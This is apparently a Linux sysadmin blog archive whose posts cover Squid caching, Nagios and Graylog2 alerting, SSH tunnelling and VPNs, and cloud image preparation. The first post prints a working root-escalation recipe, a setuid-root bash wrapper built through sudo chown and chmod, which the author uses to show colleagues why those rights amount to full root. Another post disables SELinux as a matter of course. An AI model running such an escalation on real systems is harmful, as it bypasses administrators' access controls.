Archive for the ‘Linux’ Category
My predecessor(s) had left a bunch of people at my work place (not even developers) with sudo access to chown and chmod – for the purpose of data management. For a while I had tried to explain that having sudo access to just those two commands is effectively having full root access on the machines.
I had to demonstrate it. So I did:
cat <<EOF >> make-me-root.c
#include <unistd.h>
int main() {
setuid(0);
execv("/bin/bash", NULL);
return 0;
}
EOF
gcc -o make-me-root make-me-root.c
sudo chown root make-me-root
sudo chmod u+s make-me-root
./make-me-root
Alright, demonstrated. Now it’s time for the raising eyebrows to follow.
And now also comes the part where I know it’s almost impossible to revoke privileges from people after they got used to a broken workflow.
This is going to be a quick “grocery list” to get a configuration of Apache -> Squid -> Tomcat going, allowing for a cache of multiple webapps at the same time.
The Common Case – Apache & Tomcat
Commonly people would have a configuration of Apache -> Tomcat serving web applications. However sometimes you would like to add that extra bit of simple caching for that webapp. Sometime it can really speed up things!!
Assuming you have Tomcat all configured and serving a webapp on http://localhost:8080/webapp and a vhost in apache which would look like:
<VirtualHost *:80>
ServerName www.webapp.com
LogLevel info
ErrorLog /var/log/apache2/www.webapp.com-error.log
CustomLog /var/log/apache2/www.webapp.com-access.log combined
ProxyPreserveHost On
ProxyPass /webapp http://localhost:8080/webapp
ProxyPassReverse /webapp http://localhost:8080/webapp
RewriteEngine On
RewriteOptions inherit
RewriteLog /var/log/apache2/www.webapp.com-rewrite.log
RewriteLogLevel 0
</VirtualHost>
Simple! Just forward all /webapp requests to http://localhost:8080/webapp
Squid In The Middle
A simple squid configuration for us would look like:
# some boilerplate configuration for squid
acl manager proto cache_object
acl localhost src 127.0.0.1/32
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32
acl localnet src 10.0.0.0/8
acl localnet src 172.16.0.0/12
acl localnet src 192.168.0.0/16
acl Safe_ports port 80
acl Safe_ports port 443
acl Safe_ports port 8080-8100 # webapps
acl purge method PURGE
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access allow purge localhost
http_access deny purge
http_access deny !Safe_ports
http_access allow localhost
http_access allow localnet
http_access deny all
icp_access allow localnet
icp_access deny all
http_port 3128
hierarchy_stoplist cgi-bin ?
access_log /var/log/squid/access.log squid
hosts_file /etc/hosts
coredump_dir /var/spool/squid3
# adjust your cache size!
cache_dir ufs /var/cache/squid 20480 16 256
cache_mem 5120 MB
#################################
# interesting part start here!! #
#################################
# adjust this to your liking
maximum_object_size 200 KB
# required to handle same URL with different parameters differently
# so for instance these two following URLs are treated as distict URLs, hance they will
# be cached separately
# http://localhost:8080/webapp/a?param=1
# http://localhost:8080/webapp/a?param=2
strip_query_terms off
# just for some better logging
logformat combined %>a %ui %un [%tl] "%rm %ru HTTP/%rv" %>Hs %<st "%{Referer}>h" "%{User-Agent}>h" %Ss:%Sh
# refresh_pattern is subject to change, but if you decide to cache a webapp, you must make sure it actually gets cached!
# many webapps do not like to get cached, so you can play with all sorts of parameters such as override-expire, ignore-reload
# and ignore-no-cache. the following directive will SURELY cache any page on the following webapp for 1 hours (60 minutes)
# adjust the regexp(s) below to suit your own needs!!
refresh_pattern http://localhost:8080/webapp/.* 60 100% 60 override-expire ignore-reload ignore-no-cache
Now, we need to plug apache to use the above squid configuration. Luckily it’s pretty simple, the only line you need is:
# basically every request going to http://localhost:8080/webapp, pass via squid
ProxyRemote http://localhost:8080/webapp http://localhost:3128
And the whole vhost again:
<VirtualHost *:80>
ServerName www.webapp.com
LogLevel info
ErrorLog /var/log/apache2/www.webapp.com-error.log
CustomLog /var/log/apache2/www.webapp.com-access.log combined
ProxyPreserveHost On
ProxyRemote http://localhost:8080/webapp http://localhost:3128
ProxyPass /webapp http://localhost:8080/webapp
ProxyPassReverse /webapp http://localhost:8080/webapp
RewriteEngine On
RewriteOptions inherit
RewriteLog /var/log/apache2/www.webapp.com-rewrite.log
RewriteLogLevel 0
</VirtualHost>
That’s it, now look at /var/log/squid/access.log and look for TCP_MEM_HIT and TCP_HIT. If you’re still getting TCP_MISS and the like, you’ll have to adjust your refresh_pattern in the squid configuration.
Multiple Webapps?
Not a problem if you have multiple webapps, if you want them to be cached, just add the magic line passing them through squid and the relevant squid refresh_pattern.
Don’t want a webapp to be cached? Just bypass the squid!
Recently I was presented with the following situation at work:
- Your input is a handful of directories, filled with files, some of them are a “sort of a copy” of the other
- Your output should be one directory with all the files from the source directories merged into it
- The caveat is – if any of the files collide, you must mark them somehow for inspection
So that sounds pretty simple, isn’t it? In my case the input was millions of files. I’m not sure about the exact number, it doesn’t matter. The best solution for this problem is to never get to this situation, however sometimes you just inherit stuff like that at a new work place.
The Solution
We needed a ninja. I called it ninja-merge.sh. It is a Bash wrapper for rsync that will merge directories one by one into a destination directory and handle the collisions for you using a checksum function (md5 was “good enough” for that task).
Get ninja-merge.sh here:
https://github.com/danfruehauf/Scripts/tree/master/ninja-merge
It even has unit tests and the works. All that you have to do is specify:
- A list of source directories
- A destination directory
- A directory to store the collisions
If a path collided, you might end up with something like that in your collision directory:
$ cd collision_directory && find . -type f
./a/b/filename1.nc.345c3132699d7524cefe3a161859ebee
./a/b/filename1.nc.259974c1617b40d95c0d29a6dd7b207e
Sorting the collisions is something you’ll have to do manually. Sorry!
Every so often I come across Bash scripts which are written as if Bash is a pile of rubbish and you just have to mould something ugly with it.
True, Bash is supposedly not the most “powerful” scripting language out there, but on the other hand if you’re using traditional methods then you can avoid installing gazillion ruby gems or perl/python modules (probably not even using RPM or DEB!!) just to configure your system. Bash is simple and can be elegant. But that’s not the point.
The point is that too often Bash scripts which people write have zero maintainability and readability. Why is that??
I’m not going to point at any bad examples because that’s not a very nice thing to do, although I can and easily.
Please do follow these three simple guidelines and you’ll get 90% of the job done in terms of maintainability and readability:
- Functions – Write code in functions. Break your code into manageable pieces, like any other programming language, ey?
- Avoid global variables – Global variables just make it all too complicated to follow what’s going on where. Sometimes they are needed but you can minimize the use of them.
- INDENTATION – INDENT YOUR BLOODY CODE. If you have an if or for or what not, please just indent the block under it. It’s that simple and makes your code so much more readable.
That was my daily rant.
My Bash coding (or scripting) conventions cover a bit more and can be found here:
https://github.com/danfruehauf/Scripts/tree/master/bash_scripting_conventions
I’ve been searching for a while for a solution of “how to build a fault tolerant Nagios installation” or “how to build a Nagios cluster”. Nada.
The concept is very simple, but it seems like the implementation lacks a bit, so I’ve decided to write a post about how I am doing it.
Cross Site Monitoring
The concept of cross site monitoring is very simple. Say you have nagios01 and nagios02, all that you have to setup is 2 tests:
- nagios01 monitors nagios02
- nagios02 monitors nagios01
Assuming you have puppet or chef managing the show, just make nagios01 and nagios02 (or even more nagiosXX servers) identical. Meaning all of them have the same configuration and can monitor all of your systems. A clone of each other if you’d like to call it that way.
Lets check the common use cases:
- If nagios01 goes down you get an alert from nagios02.
- If nagios02 goes down you get an alert from nagios01.
Great, I didn’t invent any wheel over here.
The main problem in this configuration is that if there is a problem (any problem) – you are going to get X alerts. X being the number of nagios servers you have.
Avoiding Duplicate Alerts
For the sake of simplicity, we’ll assume again we have just 2 nagios servers, but this would obviously scale for more.
What we actually want to do is prevent both servers from sending duplicate alerts as they are both configured the same way and will monitor the exact same thing.
One solution is to obviously have an active/passive type of cluster and all sort of complicated shenanigans, my solution is simpler than that.
We’ll “chain” nagios02 behind nagios01, making nagios02 fire alerts only if nagios01 is down.
Login to nagios02 and change /etc/nagios/private/resource.cfg, adding the line:
$USER2$="/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios"
$USER2$ will be the condition of whether or not nagios is up on nagios01.
Still on nagios02, edit /etc/nagios/objects/commands.cfg, replacing your current alerting command to depend on the condition. Here is an example for the default one:
define command{
command_name notify-host-by-email
command_line /usr/bin/printf "%b" ...
}
Change to:
define command{
command_name notify-host-by-email
command_line eval $USER2$ || /usr/bin/printf "%b" ...
}
What we have done here is simply configure nagios02 to query nagios01 nagios status before firing an alert. Easy as. No more duplicated emails.
For the sake of robustness, if you would like to configure also nagios01 with a $USER2$ variable, simply login to nagios01, change the alerting command like in nagios02 and have in /etc/nagios/private/resource.cfg:
$USER2$="/bin/false"
Assuming you have puppet or chef configuring all that, you can just assign a master ($USER2$=/bin/false) and multiple slaves that query themselves in a chain.
For example:
- nagios01 – $USER2$=”/bin/false”
- nagios02 – $USER2$=”/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios”
- nagios03 – $USER2$=”/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios && /usr/lib64/nagios/plugins/check_nrpe -H nagios02 -c check_nagios”
Enjoy!
Say you have a Nagios system monitoring everything already in your system and in addition to that you have a Graylog2 installation which parses logs from anywhere and provides you with invaluable feedback on what’s really going on in your system.
And then comes the problem, or one of them:
- Graylo2 is not really good in sending alerts (or maybe it is?)
- Nagios is already configured to send alerts and you would like to use the same contact groups for instance
The solution is below.
Design
Before making you read through the whole blog entry, I’ll just outline the solution I’ve chosen to implement and you can decide whether it’s good for you or not. Here it is in a nutshell:
- An alert is being generated in Graylo2 in a configured stream
- Graylog2 will use exec callback plugin to call an external alerting command, call it graylog2-alert.sh for instance
- graylog2-alert.sh will push an alert using send_ncsa
- Nagios parses the alert and notifies whoever is subscribed on that service
Pretty simple and bullet proof.
Graylog2 Configuration
I assume you already have Graylo2 fully configured, in this case download the wonderful exec callback plugin and place it under the plugin/alarm_callbacks directory (under the Graylog2 directory obviously).
Login to Graylog2 and enable under Settings->System the Exec alarm callback.
Click configure and point it to /usr/local/sbin/graylog2-alert.sh
That’s it for now on the Graylog2 interface side.
NSCA – Nagios Service Check Acceptor
Properly configure NSCA to work in your nagios configuration. That means usually:
- Opening port 5667 (or another port) on your nagios server
- Choosing a password for symmetrical encryption on the nagios server and the NSCA clients
- Starting the nsca daemon on the nagios server, so it will accept NSCA communications
Generally speaking configuring NSCA is out of the scope of this article and more information can be found here:
http://www.nsclient.org/nscp/wiki/doc/usage/nagios/nsca
That said, I’ll just mention that when everything works, you should be able to run successfully:
echo "HOSTNAME;SERVICE;2;Critical" | send_nsca -d ';' -H NAGIOS_HOSTNAME
graylog2-alert.sh
On the Graylog2 host, place the following file under /usr/local/sbin/graylog2-alert.sh:
#!/bin/bash
# nagios servers to notify
NAGIOS_SERVERS="NAGIOS_SERVER_1 NAGIOS_SERVER_2 NAGIOS_SERVER_3"
# add a link to the nagios message, so it's easy to access the interface
# on your mobile device once you get an alert
GL2_LINK="http://GRAYLOG_URL/streams"
main() {
local tmp_file=`mktemp`
local gl2_topic=`echo $GL2_TOPIC | cut -d'[' -f2 | cut -d']' -f1`
echo `hostname`";Graylog2-$gl2_topic;2;$GL2_LINK $GL2_DESCRIPTION" > $tmp_file
local nagios_server
for nagios_server in $NAGIOS_SERVERS; do
/usr/sbin/send_nsca -d ';' -H $nagios_server < $tmp_file
done
rm -f $tmp_file
}
main "$@"
This in combination of what we did before will fire alerts from Graylo2 -> exec callback plugin -> graylog2-alert.sh -> NSCA -> nagios server.
The nagios side
All you have left to do now is to define services for use with Graylog2 alerts. It is a rather straight forward service configuration for nagios, here is mine (generated puppet in case you wonder):
define service {
service_description Graylog2-STREAM_NAME
host REPLACE_WITH_YOUR_GRAYLOG2_HOST
use generic-service
contact_groups Graylog2-STREAM_NAME
passive_checks_enabled 1
max_check_attempts 1
# enable active checks only to reset the alarm
active_checks_enabled 1
check_command check_tcp!22
normal_check_interval 10
notification_interval 10
# set the contact group
contact_groups Graylog2-STREAM_NAME
flap_detection_enabled 0
}
define contactgroup{
contactgroup_name Graylog2-STREAM_NAME
alias Graylog2-STREAM_NAME
members dan
}
We usually have a contact group per Graylog2 stream. We just associate developers with the topic that’s relevant to them.
Restart your nagios and you’re set. Don’t forget to also start nsca!!
Resetting the alert
Graylog2 and NSCA will never generate “positive” OK alerts, but only critical ones. So you need a mechanism to reset the alert every once in a while. If you will scroll up you will see that I check port 22 (SSH) on the Graylog2 host.
How often you ask?
When configuring a new stream in Graylog2, it is best if you match the Grace period in Graylog2 to the normal_check_interval in nagios. Which would guarantee the alert will be reset before a new one comes in.
Puppet
The whole shenanigans is obviously puppetized in our environment. Tailoring nagios to an environment is usually very different between environments so I have decided it is rather redundant to paste puppet recipes altogether.
I hope you can find this semi-tutorial helpful.
Since I got this question from way too many people, I wanted to just share my “cross distribution” and “cross desktop environment” way of doing that very simple thing of enabling a Hebrew keyboard layout under Linux.
Easy As
After logging into your desktop environment, type this:
setxkbmap -option grp:switch,grp:alt_shift_toggle,grp_led:scroll us,il
Alt+Shift will get you between Hebrew and English. Easy as.
Sustainability
Making it permanent is just as easy:
mkdir -p ~/.config/autostart && cat <<EOF > ~/.config/autostart/hebrew.desktop
[Desktop Entry]
Encoding=UTF-8
Name=Hebrew
Comment=Enable a Hebrew keyboard layout
Exec=setxkbmap -option grp:switch,grp:alt_shift_toggle,grp_led:scroll us,il
EOF
Should sustain logout/login, reboots, reinstalls (as long as you keep /home on a different partition), distribution changes and choosing a different desktop environment (KDE, GNOME, LXDE, etc.).
I personally have a numerous number of hosts which I sometimes have to SSH to. It can get rather confusing and inefficient if you get lost among them.
I’m going to show you here how you can get your SSHing to be heaps more efficient with just 5 minutes of your time.
.ssh/config
In $HOME/.ssh/config I usually store all my hosts in such a way:
Host host1
Port 1234
User root
HostName host1.potentially.very.long.domain.name.com
Host host2
Port 5678
User root
HostName host2.potentially.very.long.domain.name.com
Host host3
Port 9012
User root
HostName host3.potentially.very.long.domain.name.com
You obviously got the idea. So if I’d like to ssh to host2, all I have to do is:
ssh host2
That will ssh to root@host2.potentially.very.long.domain.name.com:5678 – saves a bit of time.
I usually manage all of my hosts in that file. Makes life simpler, even use git if you feel like it…
Auto complete
I’ve added to my .bashrc the following:
_ssh_hosts() {
local cur="${COMP_WORDS[COMP_CWORD]}"
COMPREPLY=()
local ssh_hosts=`grep ^Host ~/.ssh/config | cut -d' ' -f2 | xargs`
[[ ! ${cur} == -* ]] && COMPREPLY=( $(compgen -W "${ssh_hosts}" -- ${cur}) )
}
complete -o bashdefault -o default -o nospace -F _ssh_hosts ssh 2>/dev/null \
|| complete -o default -o nospace -F _ssh_hosts ssh
complete -o bashdefault -o default -o nospace -F _ssh_hosts scp 2>/dev/null \
|| complete -o default -o nospace -F _ssh_hosts scp
Sweet. All that you have to do now is:
$ ssh TAB TAB
host1 host2 host3
We are a bit more efficient today.
SSH is amazing
Show me one unix machine today without SSH. It’s everywhere, for a reason.
OpenSSH specifically allows you to do so much with it. What would we have done without SSH?
OpenSSH Tunnelling and full VPN
Tunnelling with SSH is really cool, utilizing the secure SSH connection you can virtually secure any TCP/IP connection using port forwarding (-R and -L):
http://www.openssh.org/faq.html#2.11
However for full VPN support, you can use -w which opens a tun/tap device on both ends of connection, allowing you potentially to have all of your network passing via your SSH connection. In other words – full VPN support for free!!!
Server configuration
On the server, the configuration would be minimal:
- Allow tunnelling in sshd configuration
echo 'PermitTunnel=yes' >> /etc/ssh/sshd_config
service sshd reload
Allow forwarding
-I FORWARD -i tun+ -j ACCEPT
-I FORWARD -o tun+ -j ACCEPT
-I INPUT -i tun+ -j ACCEPT
-I POSTROUTING -o EXTERNAL_INTERFACE -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
That’s all!! Congratulations on your new VPN server!!
Client configuration (your personal linux machine)
These 2 commands will configure you with a very simple VPN (run as root!!!):
ssh -f -v -o Tunnel=point-to-point \
-o ServerAliveInterval=10 \
-o TCPKeepAlive=yes \
-w 100:100 root@YOUR_SSH_SERVER \
'/sbin/ifconfig tun100 172.16.40.1 netmask 255.255.255.252 pointopoint 172.16.40.2' && \
/sbin/ifconfig tun100 172.16.40.2 netmask 255.255.255.252 pointopoint 172.16.40.1
The only downside of this awesome VPN is that you have to be root on both ends.
But this whole setup is rather clumsy, lets use some UI for that, no?
NetworkManager-ssh
Somewhere in time, after intensively working in a company dealing with VPNs (but no SSH VPNs at all) I was looking at my taskbar at NetworkManager and thinking “Hey! There’s an OpenVPN, PPTP and IPSEC plugin for NetworkManager, why not build a SSH VPN plugin?”
And hell, why not?
I started searching the Internet frantically, believing that someone already implemented that ingenious idea (like most good ideas), but except for one mailing list post from a few years ago where someone suggested to implement it – nada.
Guess it’s my prime time. Within a week of forking the code of NetworkManager-openvpn (the NetworkManager OpenVPN plugin) I managed to get something that actually works (ssh-agent authentication only). I was surprised because I’ve never dealt with glib/gtk infrastructure not to mention UI programming (I’m a pure backend/infrastructure developer for the most of it).
And today?
I’m writing this post perhaps 2 months after I started development and committed my first alpha release. While writing this post I’m trying to submit NetworkManager-ssh to fedora (fedora-extras to be precise).
Getting into the bits and bytes behind it is redundant, all that you have to know is that the source is available here:
https://github.com/danfruehauf/NetworkManager-ssh
It compiles easily into a RPM or DEB for your convenience. I urge you to give it a shot and please open me issues on github if you find any.
Cloud computing and being lazy
The need to create template images in our cloud environment is obvious. Especially with Amazon EC2 offering an amazing API and spot instances in ridiculously low prices.
In the following post I’ll show what I am doing in order to prepare a “puppet-ready” image.
Puppet for the rescue
In my environment I have puppet configured and provisioning any of my machines. With puppet I can deploy anything I need – “if it’s not in puppet – it doesn’t exist”.
Coupled with Puppet dashboard the interface is rather simple for manually adding nodes. But doing stuff manually is slow. I assume that given the right base image I (and you) can deploy and configure that machine with puppet.
In other words, the ability to convert a bare machine to a usable machine is taken for granted (although it is heaps of work on its own).
Handling the “bare” image
Most cloud computing providers today provide you (usually) with an interface for starting/stopping/provisioning machines on its cloud.
The images the cloud providers are usually supplying are bare, such as CentOS 6.3 with nothing. Configuring an image like that will require some manual labour as you can’t even auto-login to it without some random password or something similar.
Create a “puppet ready” image
So if I boot up a simple CentOS 6.x image, these are the steps I’m taking in order to configure it to be “puppet ready” (and I’ll do it only once per cloud computing provider):
# install EPEL, because it's really useful
rpm -q epel-release-6-8 || rpm -Uvh http://download.fedoraproject.org/pub/epel/6/`uname -i`/epel-release-6-8.noarch.rpm
# install puppet labs repository
rpm -q puppetlabs-release-6-6 || rpm -ivh http://yum.puppetlabs.com/el/6/products/i386/puppetlabs-release-6-6.noarch.rpm
# i usually disable selinux, because it's mostly a pain
setenforce 0
sed -i -e 's!^SELINUX=.*!SELINUX=disabled!' /etc/selinux/config
# install puppet
yum -y install puppet
# basic puppet configuration
echo '[agent]' > /etc/puppet/puppet.conf
echo ' pluginsync = true' >> /etc/puppet/puppet.conf
echo ' report = true' >> /etc/puppet/puppet.conf
echo ' server = YOUR_PUPPETMASTER_ADDRESS' >> /etc/puppet/puppet.conf
echo ' rundir = /var/run/puppet' >> /etc/puppet/puppet.conf
# run an update
yum update -y
# highly recommended is to install any package you might deploy later on
# the reason behind it is that it will save a lot of precious time if you
# install 'httpd' just once, instead of 300 times, if you deploy 300 machines
# also recommended is to run any 'baseline' configuration you have for your nodes here
# such as changing SSH port or applying common firewall configuration for instance
yum install -y MANY_PACKAGES_YOU_MIGHT_USE
# and now comes the cleanup phase, where we actually make the machine "bare", removing
# any identity it could have
# set machine hostname to 'changeme'
hostname changeme
sed -i -e "s/^HOSTNAME=.*/HOSTNAME=changeme" /etc/sysconfig/network
# remove puppet generated certificates (they should be recreated)
rm -rf /etc/puppet/ssl
# stop puppet, as you should change the hostname before it will be permitted to run again
service puppet stop; chkconfig puppet off
# remove SSH keys - they should be recreated with the new machine identity
rm -f /etc/ssh/ssh_host_*
# finally add your key to authorized_keys
mkdir -p /root/.ssh; echo "YOUR_SSH_PUBLIC_KEY" > /root/.ssh/authorized_keys
Power off the machine and create an image. This is your “puppet-ready” image.
Using the image
Now you’re good to go, create a new image from that machine and any machine you’re going to create in the future should be based on that image.
When creating a new machine the steps you should follow are:
- Start the machine with the “puppet-ready” image
- Set the machine’s hostname
hostname=uga.bait.com
hostname $hostname
sed -i -e "s/^HOSTNAME=.*/HOSTNAME=$hostname/" /etc/sysconfig/network
Run ‘puppet agent –test’ to generate a new certificate request
Add the puppet configuration for the machine, for puppet dashboard it’ll be something similar to:
hostname=uga.bait.com
sudo -u puppet-dashboard RAILS_ENV=production rake -f /usr/share/puppet-dashboard/Rakefile node:add name=$hostname
sudo -u puppet-dashboard RAILS_ENV=production rake -f /usr/share/puppet-dashboard/Rakefile node:groups name=$hostname groups=group1,group2
sudo -u puppet-dashboard RAILS_ENV=production rake -f /usr/share/puppet-dashboard/Rakefile node:parameters name=$hostname parameters=parameter1=value1,parameter2=value2
Authorize the machine in puppetmaster (if autosign is disabled)
Run puppet:
# initial run, might actually change stuff
puppet agent --test
service puppet start; chkconfig puppet on
This is 90% of the work if you want to quickly create usable machines on the fly, it shortens the process significantly and can be easily implemented to support virtually any cloud computing provider!
I personally have it all scripted and a new instance on EC2 takes me 2-3 minutes to load + configure. It even notifies me politely via email when it’s done.
I’m such a lazy bastard.